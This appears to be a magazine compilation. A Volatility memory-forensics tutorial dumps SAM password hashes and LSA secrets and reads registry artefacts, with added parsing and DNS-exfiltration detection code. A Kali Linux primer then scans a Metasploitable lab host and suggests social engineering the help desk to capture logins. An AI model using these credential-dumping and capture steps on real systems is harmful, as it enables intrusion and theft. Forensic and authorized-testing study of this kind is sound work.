0xe1542008 0x06c48008 \Device\HarddiskVolume1\WINDOWS\system32\config\default
0xe1537b60 0x06ae4b60 \SystemRoot\System32\Config\SECURITY
0xe1544008 0x06c4b008 \Device\HarddiskVolume1\WINDOWS\system32\config\SAM
0xe13ae580 0x01bbd580 [no name]
0xe101b008 0x01867008 \Device\HarddiskVolume1\WINDOWS\system32\config\system
0xe1008978 0x01824978 [no name]
0xe1e158c0 0x009728c0 \Device\HarddiskVolume1\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1da4008 0x0016e008 \Device\HarddiskVolume1\Documents and Settings\Administrator\NTUSER.DAT

Figure 15. Highlighted SAM and SYSTEM Virtual Addresses/Offsets


Now that we have the virtual addresses of the SAM and SYSTEM hives, we will use them to dump the hashes:


Volatility.exe -f WinXP.raw --profile=WinXPSP2x86 hashdump -y system_virtual -s sam_virtual


You have to pass the SYSTEM hive's virtual address with -y and the SAM hive's virtual address with -s.


D:\MEMORY>Volatility.exe -f WinXPSP2.vmem --profile=WinXPSP2x86 hashdump -y 0xe101b008 -s 0xe1544008
Volatility Foundation Volatility Framework 2.3.1
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:4e857c004024e53cd538de64deda??5b:842b4013c45a3b8fec76ca54e5910581:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:8???385a61425fc7874c3268aa249ea1:::

Figure 16. Dumped Hashes from Windows Registry ("?" marks a hex digit unreadable in the scan)

Now we have dumped the hashes of all users, including the Administrator.
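The two steps just shown, reading the SYSTEM/SAM/SECURITY offsets off hivelist and then interpreting the hashdump lines, are mechanical enough to script, and scripting them also gives a place to put the checks an investigator applies to a hash dump: accounts with an empty password, accounts that still store an LM hash (meaning LM hashing was not disabled and the password is 14 characters or shorter), and hashes that match well-known trivial passwords. The block below is an added example, not code from the article or the Volatility project. Its hivelist sample is transcribed from Figure 15; the hashdump sample is constructed test data built from the well-known LM/NT hashes of the empty string and of the word "password", plus a made-up NT hash for the SUPPORT account. The image and profile names are the ones the chapter uses.

```python
"""Locate hive offsets from hivelist output, build the hashdump/lsadump command lines,
and audit the hashdump lines for empty, LM-stored and known-weak passwords.

Added example, not from the article or the Volatility project. HIVELIST_OUTPUT is
transcribed from Figure 15; HASHDUMP_OUTPUT is constructed test data.
"""
import re

HIVELIST_OUTPUT = r"""
Virtual    Physical   Name
0xe153ab60 0x06b7db60 \Device\HarddiskVolume1\WINDOWS\system32\config\software
0xe1537b60 0x06ae4b60 \SystemRoot\System32\Config\SECURITY
0xe1544008 0x06c4b008 \Device\HarddiskVolume1\WINDOWS\system32\config\SAM
0xe13ae580 0x01bbd580 [no name]
0xe101b008 0x01867008 \Device\HarddiskVolume1\WINDOWS\system32\config\system
"""

# Constructed: Administrator has the LM and NT hashes of "password", Guest has an empty
# password, SUPPORT_388945a0 has no LM hash and a made-up NT hash.
HASHDUMP_OUTPUT = """\
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty string (also "no LM hash stored")
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty string
KNOWN_WEAK_NT = {"8846f7eaee8fb117ad06bdd830b7586c": "password"}  # extend from your own wordlist hashes

HIVE_RE = re.compile(r"^(0x[0-9a-f]+)\s+(0x[0-9a-f]+)\s+(.+?)\s*$", re.I)


def parse_hivelist(text):
    """Return {virtual offset: hive path} for every data row of hivelist output."""
    hives = {}
    for line in text.splitlines():
        m = HIVE_RE.match(line.strip())
        if m:
            hives[int(m.group(1), 16)] = m.group(3)
    return hives


def find_hive(hives, short_name):
    """Find a hive by file name whether it is listed as \\Device\\..., \\SystemRoot\\... or \\REGISTRY\\MACHINE\\..."""
    for offset, path in hives.items():
        if path != "[no name]" and path.rsplit("\\", 1)[-1].lower() == short_name.lower():
            return offset
    raise KeyError(f"hive {short_name} not present in hivelist output")


def hashdump_command(hives, image="WinXP.raw", profile="WinXPSP2x86"):
    system, sam = find_hive(hives, "system"), find_hive(hives, "SAM")
    return f"Volatility.exe -f {image} --profile={profile} hashdump -y {system:#x} -s {sam:#x}"


def lsadump_command(hives, image="WinXP.raw", profile="WinXPSP2x86"):
    system, security = find_hive(hives, "system"), find_hive(hives, "SECURITY")
    return f"Volatility.exe -f {image} --profile={profile} lsadump -y {system:#x} -s {security:#x}"


def parse_hashdump(text):
    """pwdump-style lines: user:RID:LM hash:NT hash:::"""
    accounts = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) >= 4 and parts[1].isdigit():
            accounts.append({"user": parts[0], "rid": int(parts[1]),
                             "lm": parts[2].lower(), "nt": parts[3].lower()})
    return accounts


def audit_hashes(accounts):
    """Map each user to the list of findings that apply to its hashes."""
    findings = {}
    for a in accounts:
        notes = []
        if a["nt"] == EMPTY_NT:
            notes.append("empty_password")
        if a["lm"] != EMPTY_LM:
            notes.append("lm_hash_stored")
        if a["nt"] in KNOWN_WEAK_NT:
            notes.append("known_weak_password")
        findings[a["user"]] = notes
    return findings


if __name__ == "__main__":
    hives = parse_hivelist(HIVELIST_OUTPUT)
    print(hashdump_command(hives))
    print(lsadump_command(hives))
    for user, notes in audit_hashes(parse_hashdump(HASHDUMP_OUTPUT)).items():
        print(f"{user}: {', '.join(notes) or 'no findings'}")
```

Matching hives on the final path component is what makes the lookup robust: the same SECURITY hive appears under \SystemRoot\... on this XP image and under \REGISTRY\MACHINE\... on the Windows 7 image in Chapter 4, and both spellings resolve the same way.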


LSA Secrets

That's the beauty of memory forensics: we can collect a lot of information about the compromised system in an
investigation. Before we start dumping LSA Secrets we have to understand what they are. Many of you may already know,
but this is a beginners guide, so let's start from the beginning.

LSA Secrets is a special protected storage area for important data used by the Local Security Authority (LSA)
in Windows. That storage area holds important data for local security policies, auditing, authentication and
logging users on to the system, and it stores the system's and users' sensitive data as
secrets. Access to this secret data is only available to the system. When LSA Secrets first appeared in Windows it
stored cached domain records, but over time Microsoft's developers extended it, and now LSA Secrets stores
Internet Explorer passwords, RAS connection passwords, SQL and Cisco passwords, service account passwords,
private user data such as EFS encryption keys, and a lot more.

The registry key where LSA secrets are stored is HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets, and the parent
key HKEY_LOCAL_MACHINE\SECURITY\Policy contains additional data necessary for accessing and decrypting
the secrets.

Dumping LSA Secrets

The Volatility framework's "lsadump" plugin provides a great facility to dump LSA Secrets from the Windows
registry. To dump the LSA Secrets we have to pass the necessary parameters: the virtual addresses (offsets) of the
SYSTEM and SECURITY hives.

Volatility.exe -f WinXP.raw --profile=WinXPSP2x86 lsadump -y system_offset -s security_offset
Figure 17. Dumped LSA Secrets from Windows Registry (console screenshot of lsadump on the WinXP image; the scan
is largely unreadable, but the secret names L$RTMTIMEBOMB_<GUID>, _SC_LmHosts, _SC_upnphost and _SC_ALG are
legible, each followed by a hex/ASCII dump of the secret's bytes)

You can see the dumped LSA Secrets in the above image. This data is in encrypted form: the first 12 bytes
contain metadata and the remaining data is encrypted.

Note

If you want more detailed information about LSA Secrets, I suggest you read these articles at least once:

• http://www.passcape.com/index.php?section=docsys&cmd=details&id=23

• http://moyix.blogspot.in/2008/02/decrypting-lsa-secrets.html

Chapter 6 - Shellbags Analysis 

One of the most important parts of Windows registry forensics is Shellbags analysis. 

Shellbags analysis matters to a registry investigator because a great deal of information and evidence 
can be collected from these keys. Shellbags hold some of the most useful data for an investigation. 

Introduction to shellbags and its analysis 

Microsoft Windows tracks a user's folder viewing preferences (window size, icon, view mode) in Windows 
Explorer. This is called Shellbags information, and it is stored in the Windows registry in two different 
places. Shellbags are all about directories: when somebody opens or closes a folder, an entry is recorded 
in the Shellbags, and that entry stays in the registry even if the folder is later deleted. An investigator 
can therefore use Shellbags to enumerate past mounted volumes, deleted files, and user actions. 

You can find Shellbags information in the registry at these locations: 

• HKEY_USERS\{USERID}\Software\Microsoft\Windows\Shell\ 

• HKEY_USERS\{USERID}\Software\Microsoft\Windows\ShellNoRoam\ 

Shellbags information is stored in the registry in encrypted form. I suggest you read the research paper 
“Using Shellbags Information to Reconstruct User Activity” at least once. 

Now to the Volatility framework: it is an awesome framework that provides Shellbags analysis through a single 
plugin, “shellbags”, which extracts all the Shellbags information from the Windows registry. 

The output of this plugin is easy to read, as the example below shows: 

Volatility.exe -f WinXP.raw --profile=WinXPSP2x86 shellbags 
D:\MEMORY>Volatility.exe -f WinXP.raw --profile=WinXPSP2x86 shellbags 
Volatility Foundation Volatility Framework 2.3.1 
Scanning for registries.... 
Gathering shellbag items and building path tree... 

Registry: \Device\HarddiskVolume1\Documents and Settings\Administrator\NTUSER.DAT 
Key: Software\Microsoft\Windows\Shell\Bags\1\Desktop 
Last updated: 2013-12-26 09:27:32 UTC+0000 

[Screenshot continues: a table with the columns Value, File Name, Modified Date, Create Date, Access Date and File Attr; the Value column holds entries such as ItemPos1304x715(1) and ItemPos1366x768(1), the File Name column short names such as MOZILL~1.LNK and file.txt, the date columns December 2013 timestamps, and File Attr is ARC or DIR] 

Figure 18. Shellbags Information 


The image above shows a snippet of the shellbags plugin output. As you can see, the plugin gives us 
a lot of information about directories and the links or files in them (links or files, because Shellbags 
manage visual preferences such as icon, size and view). The investigator now has a lot of information 
about the compromised system, such as when a folder or directory was last accessed and when it was 
modified or created. For example, the Value column shows the screen resolution and then the file name, 
and the Modified, Create and Access columns show the activity on that directory or file. 

I suggest you try it at least once. If you want to save all the output of the shellbags plugin to a text 
file, use the following command: 

Volatility.exe -f WinXP.raw --profile=WinXPSP2x86 shellbags > shellbags.txt 

Everything the shellbags plugin would print to the console is then stored in the shellbags text file, 
which you can open and analyse as the case requires. 

Chapter 7 - User Assist and Shim Cache Analysis 

In this chapter we discuss UserAssist and Shim Cache analysis. Both are important for 
Windows Registry Forensics (WRF). 


Introduction to UserAssist and Its Analysis 

UserAssist is another important source of evidence in the Windows registry. The Windows operating system 
stores user activity under this registry key: 

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist 

UserAssist shows the programs (executables and links) that were run on Windows, with the last execution 
time and the path of each executed program. 

UserAssist helps the investigator find out which program was executed last, or which programs were executed 
at all, on a Windows machine. How this is investigated depends on the case: suppose a malicious .exe file was 
executed on the compromised machine; UserAssist then helps the investigator find the evidence. 
D:\MEMORY>Volatility.exe -f WinXP.raw --profile=WinXPSP2x86 userassist 
Volatility Foundation Volatility Framework 2.3.1 

Registry: \Device\HarddiskVolume1\Documents and Settings\Administrator\NTUSER.DAT 
Key name: Count 
Last updated: 2013-12-28 08:35:02 UTC+0000 

Subkeys: 

Values: 

REG_BINARY    UEME_CTLSESSION : 
0x00000000  e5 10 78 0e 06 00 00 00                           ..x..... 

REG_BINARY    UEME_RUNPIDL:%csidl2%\MSN.lnk : 
ID:           1 
Count:        14 
Last updated: 2013-12-18 18:01:48 UTC+0000 
0x00000000  01 00 00 00 13 00 00 00 ba c8 94 38 1b fc ce 01   ...........8.... 

REG_BINARY    UEME_RUNPIDL:%csidl2%\Windows Media Player.lnk : 
ID:           1 
Count:        13 
Last updated: 2013-12-18 18:01:48 UTC+0000 
0x00000000  01 00 00 00 12 00 00 00 ba c8 94 38 1b fc ce 01   ...........8.... 

REG_BINARY    UEME_RUNPIDL:%csidl2%\Windows Messenger.lnk : 
ID:           1 
Count:        12 
Last updated: 2013-12-18 18:01:48 UTC+0000 
0x00000000  01 00 00 00 11 00 00 00 ba c8 94 38 1b fc ce 01   ...........8.... 


Figure 19. Dumped User Assist Data for Analysis 

Volatility.exe -f WinXP.raw --profile=WinXPSP2x86 userassist 

The Volatility framework provides a very good and useful plugin for dumping UserAssist information from the 
Windows registry. In the example above you can see that we dump it with the “userassist” plugin. The image 
shows dumped data such as REG_BINARY values, ID, Count, Last updated and some encrypted data. The 
information within the binary UserAssist values contains only statistical data on the applications launched 
by the user via Windows Explorer. 
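The XP-format value behind those ID, Count and Last updated lines can be decoded by hand as follows. This is an added example, not code from the book or from Volatility; it assumes the 16-byte XP layout (session ID, run count and a FILETIME) with the counter stored 5 higher than the real run count, and the ROT13 encoding of value names, and the sample bytes are constructed from the first UEME_RUNPIDL entry shown in Figure 19.

```python
import codecs
import struct
from datetime import datetime, timedelta, timezone

# Constructed sample: in the registry the value name is ROT13-encoded and the
# userassist plugin shows it decoded; this is the encoded form of the first
# UEME_RUNPIDL entry in Figure 19.
RAW_NAME = codecs.encode("UEME_RUNPIDL:%csidl2%\\MSN.lnk", "rot_13")

# Constructed from the 16 data bytes shown for that entry in Figure 19.
RAW_DATA = bytes.fromhex("01000000 13000000 bac89438 1bfcce01")

_FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(filetime: int) -> datetime:
    """Convert a Windows FILETIME (100 ns ticks since 1601-01-01 UTC)."""
    return _FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def parse_userassist_xp(name: str, data: bytes) -> dict:
    """Decode one Windows XP UserAssist value.

    XP layout, 16 bytes little endian: uint32 session id, uint32 run count,
    uint64 FILETIME of the last run. The stored counter starts at 5, so 5 is
    subtracted to obtain the real run count (0x13 = 19 becomes 14 here).
    """
    if len(data) != 16:
        raise ValueError("expected a 16-byte XP UserAssist value")
    session_id, raw_count, filetime = struct.unpack("<IIQ", data)
    count = raw_count - 5 if raw_count > 5 else raw_count
    return {
        "name": codecs.decode(name, "rot_13"),
        "id": session_id,
        "count": count,
        "last_updated": filetime_to_datetime(filetime),
    }


if __name__ == "__main__":
    entry = parse_userassist_xp(RAW_NAME, RAW_DATA)
    print(entry["name"])
    print("ID:", entry["id"], "Count:", entry["count"])
    print("Last updated:", entry["last_updated"].strftime("%Y-%m-%d %H:%M:%S UTC"))
```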

Note 

If you want to know more about UserAssist and analyze it in a better way, I suggest you read this article: 
http://www.aldeid.com/wiki/Windows-userassist-keys 

Introduction to Shim Cache and Its Analysis 

Shim Cache analysis is one of my favourite analyses in Windows registry forensics (WRF). Let's start from 
the basics; there are two things to understand: “what is the shim cache?” and “how can we analyze it for 
forensics?” So let's start with the first question: what is the shim cache? 

The Shimcache records the .exe files that were executed on Windows. If a file was executed through Windows' 
“CreateProcess”, it is logged in the Shimcache key. The shim cache also checks application compatibility with 
Windows Explorer. UserAssist and Shim Cache are mostly helpful in malware cases. In simpler words: suppose 
a person runs Adobe Photoshop on Windows and this application is perfectly compatible with the OS; once 
Adobe Photoshop executes, a log entry is stored in the Windows registry under the shim cache key. 

The Volatility framework provides the shimcache plugin to dump all the shimcache data. When you run this 
plugin, the output lists all the executables that are compatible with Windows and were executed on that 
Windows machine. All of this data is stored in the Windows registry. 

Volatility.exe -f Win7.raw --profile=Win7SP1x86 shimcache 
D:\MEMORY>Volatility.exe -f Win7.raw --profile=Win7SP1x86 shimcache 
Volatility Foundation Volatility Framework 2.3.1 
Last Modified                  Path 

[Screenshot continues: one row per cached executable, mostly 2009-07-14 timestamps for Windows binaries such as \??\C:\Windows\system32\LogonUI.exe, SearchFilterHost.exe, SearchProtocolHost.exe, taskhost.exe, PING.EXE, rundll32.exe and powercfg.exe, plus later entries such as \Program Files\WinRAR\WinRAR.exe, \Program Files\Mozilla Firefox\firefox.exe and \Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\ffcert.exe] 

Figure 20. Dumped ShimCache Information for Analysis 


The image above shows a snippet of shimcache information. The Volatility framework's “shimcache” plugin 
works with the Windows 7 image. 

Chapter 8 - Most Recent Used 

Now for some juicy and interesting information: Most Recently Used (MRU) files. The Windows registry 
stores information about recently used items in the HKCU hive. MRU analysis is one of the important 
forensic methods for an investigator. In some cases a file was executed and the system got infected or 
compromised; in such cases the most recently used files help the investigator find evidence. 

In the HKCU hive you can find MRU items on Windows Vista and Windows 7 at: 


HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\CIDSizeMRU 

Volatility.exe -f Windows7.raw --profile=Win7SP1x86 printkey -o HKCU_Offset(ntuser.dat) -K Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\CIDSizeMRU 

Legend: (S) = Stable   (V) = Volatile 

Registry: User Specified 
Key name: CIDSizeMRU (S) 
Last updated: 2014-01-24 13:28:18 UTC+0000 

Subkeys: 

Values: 
REG_BINARY    20              : (S) 
0x00000000  70 00 79 00 74 00 68 00 6f 00 6e 00 77 00 2e 00   p.y.t.h.o.n.w... 
0x00000010  65 00 78 00 65 00 00 00 00 00 00 00 00 00 00 00   e.x.e........... 
0x00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................ 
0x00000030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................ 

Figure 21. Most Recent Used Dumped 
The image above shows a snippet of an MRU value. You can see some encrypted data alongside the recently 
used file, but some of it is clearly readable: in this image the most recently used file was pythonw.exe. 
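To recover the file name from such a hex dump without re-typing it, the printkey output can be parsed directly. This is an added example, not the book's or Volatility's code; the dump text is a constructed transcription of Figure 21, and the value is assumed to be a null-terminated UTF-16LE string followed by zero padding.

```python
# Constructed transcription of the CIDSizeMRU hex dump in Figure 21 (offset,
# sixteen hex byte pairs, ASCII column), in the layout printkey prints.
SAMPLE_HEXDUMP = """\
0x00000000  70 00 79 00 74 00 68 00 6f 00 6e 00 77 00 2e 00   p.y.t.h.o.n.w...
0x00000010  65 00 78 00 65 00 00 00 00 00 00 00 00 00 00 00   e.x.e...........
0x00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x00000030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
"""

HEX_DIGITS = set("0123456789abcdefABCDEF")


def is_hex_pair(token: str) -> bool:
    return len(token) == 2 and all(c in HEX_DIGITS for c in token)


def hexdump_to_bytes(text: str) -> bytes:
    """Rebuild the raw value bytes from a printkey-style hex dump.

    Only the tokens between the offset and the ASCII column are used, at most
    16 per line; the ASCII column is skipped because it can contain characters
    that happen to look like hex pairs.
    """
    out = bytearray()
    for line in text.splitlines():
        tokens = line.split()
        if len(tokens) < 2 or not tokens[0].lower().startswith("0x"):
            continue  # not a dump line (blank, "Values:", key names, ...)
        for token in tokens[1:17]:
            if not is_hex_pair(token):
                break  # reached the ASCII column of a short line
            out.append(int(token, 16))
    return bytes(out)


def decode_mru_name(raw: bytes) -> str:
    """Decode a null-terminated UTF-16LE string, the form MRU names are stored in."""
    text = raw.decode("utf-16-le", errors="replace")
    return text.split("\x00", 1)[0]


def mru_file_name(hexdump: str) -> str:
    return decode_mru_name(hexdump_to_bytes(hexdump))


if __name__ == "__main__":
    print(mru_file_name(SAMPLE_HEXDUMP))
```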

Try all of this yourself. 
Kali Linux Primer 

by Chad Oliver 

Kali Linux is the latest version of the BackTrack Linux penetration testing, security auditing, 
and forensics distribution. It is based on Debian and comes ready to go with all the tools you 
need to begin an information security engagement. 


The number of tools available in the distribution prevents us from going into depth on each tool, but this 
tutorial is designed to get you started with some of the most common tools you will use to perform a typical 
security audit. 

For the purposes of this tutorial we will be running a known vulnerable OS called Metasploitable which 
is available at http://www.offensivesecurity.com/metasploitunleashed/Metasploitable and we are focusing 
on network penetration testing. Kali however has much more to offer, including application testing via 
tools such as Burpsuite, and SQL Injection tools such as sqlmap. For Social Engineering engagements it is 
complete with tools such as Maltego for doing some excellent reconnaissance, BeEF for attacking browsers 
(think XSS), and it includes the Social Engineering Toolkit. 

Getting Started 

Many of the tools are command line based, and clicking a tool in the menu will open a terminal window and 
show you the help for using the tool. 


Netdiscover 0.3-beta7 [Active/passive arp reconnaissance tool] 
Written by: Jaime Penalba <jpenalbae@gmail.com> 

Usage: netdiscover [-i device] [-r range | -l file | -p] [-s time] [-n node] [-c count] [-f] [-d] [-S] [-P] [-C] 

  -i device: your network device 
  -r range: scan a given range instead of auto scan. 192.168.6.0/24,/16,/8 
  -l file: scan the list of ranges contained into the given file 
  -p passive mode: do not send anything, only sniff 
  -F filter: Customize pcap filter expression (default: "arp") 
  -s time: time to sleep between each arp request (miliseconds) 
  -n node: last ip octet used for scanning (from 2 to 253) 
  -c count: number of times to send each arp reques (for nets with packet loss) 
  -f enable fastmode scan, saves a lot of time, recommended for auto 
  -d ignore home config files for autoscan and fast mode 
  -S enable sleep time supression betwen each request (hardcore mode) 
  -P print results in a format suitable for parsing by another program 
  -L in parsable output mode (-P), continue listening after the active scan is completed 

If -r, -l or -p are not enabled, netdiscover will scan for common lan addresses. 

root@kali:~# 

Figure 1. Terminal window 


Let’s begin by using netdiscover to see what is on the network without being intrusive. We can run it in 
passive mode so it only sniffs the traffic it sees and doesn’t send anything out. Depending on the rules of 
engagement, you may want to try to stay hidden during your test, and this will get you started identifying 
machines on the network. 
Currently scanning: (passive)   |   Screen View: Unique Hosts 

85 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 5100 

  IP             At MAC Address       Count  Len   MAC Vendor 
  192.168.1.1    20:4e:7f:3d:64:d6    53     3180  Unknown vendor 
  192.168.1.119  08:00:27:9c:4b:37    06     360   CADMUS COMPUTER SYSTEMS 
  192.168.1.128  00:1f:5b:3e:a7:c3    08     480   Apple, Inc. 
  192.168.1.140  54:26:96:4d:fe:7f    15     900   Unknown vendor 
  192.168.1.116  b8:8d:12:0b:7e:74    03     180   Unknown vendor 

Figure 2. Using as Unknown Vendor 

The second entry is our Metasploitable instance. This doesn’t give us much to go on, but you can see a couple 
of devices on the network and their manufacturer if it’s known. So let’s take a look at the traffic and see what 
we find. 


Watching the Traffic 


Wireshark is a fantastic tool for watching, capturing, and analyzing network traffic. I’ve personally used it 
on very large incident responses to data breaches and used it to track down conversations between exploited 
systems and the external attackers. It quickly lets you identify the protocol being used and the IP addresses 
of the machines communicating. Once you’ve identified something worth investigating you can right click 
on the capture and set up filters to watch specific conversations, IP addresses, protocols, etc. 


[Screenshot: Wireshark 1.10.2 capturing on eth0; the packet list shows TCP and HTTP traffic between 192.168.1.116 and 208.82.236.243, the details pane expands a DNS query from 192.168.1.116 to 192.168.1.1 (Ethernet II, IPv4, UDP, DNS), and the status bar reports 1401 packets displayed] 

Figure 3. Investigating 


Wireshark not only shows you the basic information about the traffic, it has two additional sections below 
that let you analyze each packet and see exactly what is being transmitted. When performing a penetration 
test it is useful to let it run for a long time and then go back through the data examining protocols used, 
active IP addresses, etc. Any protocols that can be used to transmit credentials in clear text are a great score 
such as telnet and http. For example, if you find a network router that has the web interface enabled, it’s 
certainly worth a look to see if you can catch someone logging in. Depending on your rules of engagement, 
it may be a little dirty pool, but you could set Wireshark capturing traffic while you call help desk and 
report some connectivity issues to try to get them to log into the router. Remember that any traffic is worth 
examining regardless of how mundane it may appear. During an incident response with a live APT in the 




network I noticed some peculiar DNS traffic and discovered the attackers had been using DNS to exfiltrate 
data by having the compromised machines look up things such as sensitivecustomerdata.evilattackershost.ee. 
It wasn’t quite that simple, but that gives you an idea. 
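A simple detector for that pattern (one client querying many long or random-looking leftmost labels under a single domain), as an added example that is not part of the article; it runs over constructed sample queries with placeholder names, uses a naive "last two labels" rule for the registered domain, and its thresholds are assumptions to tune per environment.

```python
import math
from collections import defaultdict

# Constructed sample query log as (client IP, queried name) pairs. The names are
# placeholders shaped like the exfiltration hostnames described above; none is real.
SAMPLE_QUERIES = [
    ("10.0.0.5", "www.example.com"),
    ("10.0.0.5", "mail.example.com"),
    ("10.0.0.5", "www.example.com"),
    ("10.0.0.7", "sensitivecustomerdata.evilattackershost.example"),
    ("10.0.0.7", "4163636f756e743a2031323334353637.evilattackershost.example"),
    ("10.0.0.7", "42616c616e63653a20313030302e3030.evilattackershost.example"),
    ("10.0.0.7", "4f72646572733a203230313331323138.evilattackershost.example"),
    ("10.0.0.9", "cdn.example.com"),
]

# Thresholds are assumptions for this example; tune them for your environment.
MIN_UNIQUE_LABELS = 3        # distinct leftmost labels per client and domain
LABEL_LEN_THRESHOLD = 20.0   # average leftmost-label length in characters
ENTROPY_THRESHOLD = 3.5      # average Shannon entropy of the labels, bits/char


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character; encoded data scores higher than words."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(name: str):
    """Return (leftmost label, registered domain).

    Uses a naive 'last two labels' rule for the registered domain; a real
    deployment should use the public suffix list instead.
    """
    labels = name.rstrip(".").lower().split(".")
    if len(labels) < 3:
        return None, ".".join(labels)
    return labels[0], ".".join(labels[-2:])


def find_suspicious(queries):
    """Group queries by (client, domain) and flag groups whose leftmost labels
    look like carried data: many distinct labels that are long or high-entropy.
    Returns {(client, domain): stats} for the flagged groups only."""
    groups = defaultdict(set)
    for client, name in queries:
        label, domain = split_name(name)
        if label is not None:
            groups[(client, domain)].add(label)

    findings = {}
    for key, labels in groups.items():
        if len(labels) < MIN_UNIQUE_LABELS:
            continue
        avg_len = sum(len(label) for label in labels) / len(labels)
        avg_entropy = sum(shannon_entropy(label) for label in labels) / len(labels)
        if avg_len >= LABEL_LEN_THRESHOLD or avg_entropy >= ENTROPY_THRESHOLD:
            findings[key] = {
                "unique_labels": len(labels),
                "avg_label_len": avg_len,
                "avg_entropy": avg_entropy,
            }
    return findings


if __name__ == "__main__":
    for (client, domain), stats in find_suspicious(SAMPLE_QUERIES).items():
        print(f"{client} -> {domain}: {stats}")
```

Real exfiltration often uses shorter chunks than these, so in practice the per-domain query volume and the ratio of unique subdomains to total queries matter as much as label length.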

Fingerprinting Devices 

Before we start making noise on the network, let’s talk about a tool that can fingerprint passively, p0f. It’s 
a great tool in general to run to watch your network just to monitor health. It will tell you what devices are 
live, their OS, what type of connection they have, distance, and uptime. I like to run it in promiscuous mode, so 
executing p0f -p gets us identifying systems without making a sound. In our test environment I have found 
the Metasploitable system in the results. 


.-[ 192.168.1.116/50834 -> 192.168.1.119/445 (syn+ack) ]- 
| 
| server   = 192.168.1.119/445 
| os       = Linux 2.6.x 
| dist     = 0 
| params   = none 
| raw_sig  = 4:64+0:0:1460:mss*4,4:mss,sok,ts,nop,ws:df:0 
| 

Figure 4. Findings 

We now know a little bit more about this particular server, for example that it’s running Linux 2.6.x. We can start 
identifying machines in this way to help us zero in on our target. For example, if your client is running some 
old outdated OS (like Windows 2000) this may help you find a vulnerable system without ever 
having made a noise on the network. So far, we have only been operating in promiscuous mode and not 
sending any packets out on the network that might trip an IDS. As with all the tools mentioned in this article 
and all the other tools available on Kali Linux, you can do a little research to find lots of additional features 
that will help you do your job. 

Let’s take a moment and start making a little noise. Of course it is possible to zero in a target without making 
a wave but for the most part (unless you are intentionally evading the IDS as part of the test) your client is 
more interested in learning what you can discover in the shortest amount of time to get the biggest bang for 
their buck. It’s time we break out nmap. Nmap is a network mapping tool that is going to cut right through 
all the mess and tell us just what is running on our network, what OS, what ports are open, what services 
and versions are running, etc. It is feature rich and I encourage you to visit nmap.org and learn everything 
there is about this amazing contribution to security world. There is a wealth of options to run nmap including 
slowing the scan down to a crawl to help evade detection. Doing so will take a very long time. You can 
also increase the speed to get the task down as fast as possible. Depending on your engagement, check the 
options available and run what works best for you. You may find yourself running several scans with various 
options to help speed along your productivity. 

Taking nmap a step further and giving us the benefit of a GUI, there is Zenmap. Zenmap lets us quickly use 
nmap and shows us the results in an easier to digest format. Here we have a sample of the available ports on 
our Metasploitable instance. 
Zenmap    Target: 192.168.1.0/24    Profile: Intense scan 
Command: nmap -T4 -A -v 192.168.1.0/24 

Nmap Output | Ports / Hosts | Topology | Host Details | Scans 

Port   Protocol  State  Service      Version 
21     tcp       open   ftp          vsftpd 2.3.4 
22     tcp       open   ssh          OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 
23     tcp       open   telnet       Linux telnetd 
25     tcp       open   smtp         Postfix smtpd 
53     tcp       open   domain       ISC BIND 9.4.2 
80     tcp       open   http         Apache httpd 2.2.8 ((Ubuntu) DAV/2) 
111    tcp       open   rpcbind      2 (RPC #100000) 
139    tcp       open   netbios-ssn  Samba smbd 3.X (workgroup: WORKGROUP) 
445    tcp       open   netbios-ssn  Samba smbd 3.X (workgroup: WORKGROUP) 
512    tcp       open   exec 
513    tcp       open   login 
514    tcp       open   shell 
1099   tcp       open   java-rmi     Java RMI Registry 
1524   tcp       open   shell        Metasploitable root shell 
2049   tcp       open   nfs          2-4 (RPC #100003) 
2121   tcp       open   ftp          ProFTPD 1.3.1 
3306   tcp       open   mysql        MySQL 5.0.51a-3ubuntu5 
5432   tcp       open   postgresql   PostgreSQL DB 8.3.0 - 8.3.7 

Figure 5. Available ports 


In addition, the Topology feature of Zenmap gives us a quick glance at some insightful data. The legend is 
available at http://nmap.org/book/zenmaptopology.html, but generally speaking it uses a green, yellow, 
red colour scheme to indicate the number of open ports, red being the most. If a host is identified as a router or 
switch it is indicated by a square, otherwise by a circle. We can see our Metasploitable system as a red circle. 
On a large network this can help you quickly identify a system that may be misconfigured with everything 
open, or at least we can assume it is something with a lot of roles to fill and we may find some good services 
ripe for exploiting. Of course, in the case of our example this is obviously true. 

[Screenshot: Zenmap Topology tab for the scan “nmap -T4 -A -v 192.168.1.0/24” (Profile: Intense scan), showing the discovered hosts as coloured nodes] 

Figure 6. Example of network 
Nmap/Zenmap gives us a good view of our target, and we could do some online research on our services' 
